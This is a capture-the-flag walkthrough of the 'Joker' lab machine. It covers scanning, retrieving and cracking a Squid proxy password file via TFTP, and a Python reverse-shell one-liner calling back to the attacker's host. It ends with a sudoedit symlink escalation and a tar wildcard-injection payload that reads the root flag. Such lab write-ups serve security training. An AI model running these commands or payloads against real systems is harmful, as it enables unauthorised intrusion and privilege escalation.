Difficulty Rating:

Machine: Joker
OS: Linux
IP: 10.10.10.21

  • Nmap scan for TCP
$ nmap -A -sV -Pn 10.10.10.21 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-01 13:27 IST
Nmap scan report for 10.10.10.21
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
|   256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_  256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (EdDSA)
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.24 seconds
  • Nmap scan for UDP
$ sudo nmap -A -sV -Pn -sU 10.10.10.21 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-01 13:29 IST
Nmap scan report for 10.10.10.21
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT      STATE         SERVICE      VERSION
69/udp    open|filtered tftp
1234/udp  open|filtered search-agent
5355/udp  open|filtered llmnr
45685/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 1761/udp)
HOP RTT       ADDRESS
1   171.22 ms 10.10.14.1
2   171.31 ms 10.10.10.21

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1175.45 seconds
  • UDP port 69 (TFTP) looks interesting.
  • The website seems to be behind a proxy (Squid 3.5).
  • Default passwords file is stored at /etc/squid3/passwords
  • To get the password, use tftp
$ tftp 10.10.10.21
tftp> get /etc/squid/passwords
Received 48 bytes in 0.2 seconds
  • The content of the file is username followed by the password hash
$ cat passwords 
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0
  • Let’s crack the password using John utility
$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateseafood     (kalamari)
1g 0:00:02:51 DONE (2017-08-01 17:21) 0.005829g/s 43379p/s 43379c/s 43379C/s ihatesex!..ihateseabass
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • Configure the proxy for firefox with IP:10.10.10.21 and PORT:3128
  • Username: kalamari Password:ihateseafood
  • Visit http://127.0.0.1

Note: If you visit http://10.10.10.21, you wouldn’t get the webserver. It’s running on 127.0.0.1

  • Dirb on 127.0.0.1 via proxy
$ dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Aug  2 00:47:00 2017
URL_BASE: http://127.0.0.1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.21:3128
PROXY AUTHORIZATION: kalamari:ihateseafood

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/console (CODE:200|SIZE:1479)                                                                          
==> DIRECTORY: http://127.0.0.1/list/                                                                                   
                                                                                                                                                                                             
---- Entering directory: http://127.0.0.1/list/ ----
+ http://127.0.0.1/list/0 (CODE:200|SIZE:630)                                                                             
+ http://127.0.0.1/list/00 (CODE:200|SIZE:630)                                                                                  
+ http://127.0.0.1/list/01 (CODE:301|SIZE:251)                                                                                      
+ http://127.0.0.1/list/1 (CODE:301|SIZE:251)                                                                                           
                                                                                                                                                                                             
-----------------
END_TIME: Wed Aug  2 01:18:45 2017
DOWNLOADED: 9224 - FOUND: 5

Note: You need to connect to joker via UDP only. It freezes when you try to connect via TCP.

  • On your terminal create socat connection to listen on UDP port:
$ socat file:`tty`,echo=0,raw udp-listen:4444
  • In the input box of http://127.0.0.1/console, type:

Note: socat is used instead of netcat because socat assigns tty effectively, unlike netcat

import os,pty,socket;s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM);s.connect(("10.10.15.16", 4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE",'/dev/null');pty.spawn(["/bin/bash", "-i"]);s.close()
  • You get attacker’s shell on your terminal.
  • Type sudo -l and you can observe that :
(alekos) NOPASSWD sudoedit /var/www/*/*/layout.html
  • There’s a vulnerability for sudoedit regarding using 2 wildcards
    • https://www.exploit-db.com/exploits/37710/
  • To exploit this vulnerability, create a directory inside /var/www/testing
/var/www/testing:$ mkdir dir
/var/www/testing:$ cd dir
/var/www/testing/dir:$ ln -s /home/alekos/authorised_keys ./layout.html
  • You just created a symbolic link for authorised_keys
/var/www/testing/dir:$ ls 
/var/www/testing/dir:$ layout.html -> /home/alekos/authorized_keys
  • Run sudoedit command
$ sudoedit -u alekos /var/www/testing/dir/layout.html
  • It will open nano text editor
  • On your machine generate ssh keys and add contents of id_rsa.pub in the editor.
  • Save the file.
  • Connect via ssh
$ ssh -i id_rsa [email protected]

Note: If you get error: sign_and_send_pubkey: signing failed: agent refused operation add private key identity using. Type ssh-add on your machine.

  • Own user.
  • To own system, check backup directory. You can see they are .tar files.
  • It is a backup of /home/alekos/develoment.
  • Tar utility is vulnerable to following exploit:

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

  • Create files --checkout=1 and --checkout=exec=sh shell.sh. Create payload name shell.sh.
  • This was my payload
#!/bin/bash

cat /root/root.txt > /home/alekos/pass.txt
chmod +r /home/alekos/pass.txt
  • Wait for it to execute. (around 3-5 minutes)
  • After sometime you will find a file named pass.txt in /home/alekos/
[email protected]:~$ ls
backup  development  pass.txt  user.txt
[email protected]:~$ cat pass.txt
XXXXXX
User and Root owned!!

Share the fun!